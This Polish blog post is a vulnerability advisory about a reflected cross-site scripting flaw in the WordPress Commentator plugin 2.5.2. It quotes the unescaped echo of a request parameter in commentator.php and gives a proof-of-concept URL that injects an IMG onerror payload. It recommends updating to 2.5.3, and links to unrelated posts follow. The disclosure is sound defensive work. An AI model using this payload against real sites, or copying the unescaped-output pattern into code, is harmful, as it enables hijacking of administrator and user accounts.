Powrót

Plugin WordPress Commentator w wersji 2.5.2 podatny na atak Cross Site Scripting

Kategorie Blog

Atak Cross Site Scripting !
Plugin WordPress Commentator w wersji 2.5.2 podatny na atak Cross Site Scripting !

Odkryta podatność umożliwia przejęcie konta administratora lub użytkownika, ewentualnie może być wykorzystana do ataku na użytkowników (np. zarażenie malwarem)

Podatny kod znajduje się w pliku commentator.php

linia:441
$provider_name = $_REQUEST["provider"];

linia:544
<div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?><p>">

Przykład wykorzystania podatności:
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>

W celu zabezpieczenia swojego WordPressa należy zaktualizować plugin Comenntator do wersji 2.5.3

Zobacz po przeczytaniu jeszcze

ZAPYTANIE OFERTOWE Nr 1/ZA/2021 – Dostawa Serwerów Dedykowanych
2021-01-18
Dotyczące zamówienia przeprowadzanego zgodnie z zasadą konkurencyjności określoną w Wytycznych z dnia 22 sierpnia 2019r. w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014-2020: Zakup i dostarczenie do siedziby Zamawiającego…
Czytaj dalej
Moc obliczeniowa GPU
2022-03-11
Wysoka wydajność obliczeniowa zoptymalizowana pod kątem najbardziej wymagających obliczeń? Czym jest GPU i dlaczego serwery GPU są niezawodnym rozwiązaniem, które pozwoli Ci rozkręcić swój projekt? Moc obliczeniowa – co to? Moc obliczeniowa komputera jest określeniem liczby działań arytmetycznych, które może…
Czytaj dalej
Skuteczny backup danych. Reguła 3-2-1
2022-01-28
Backup danych to podstawa kiedy prowadzimy własny biznes w internecie. Tworzenie kopii zapasowej może zapobiec wielu niepożądanym skutkom związanymi ze zmianami na stronie. Jak wykonać backup danych skutecznie i czym jest reguła 3-2-1? Czym jest backup Zanim przejdziemy do wyjaśnienia…
Czytaj dalej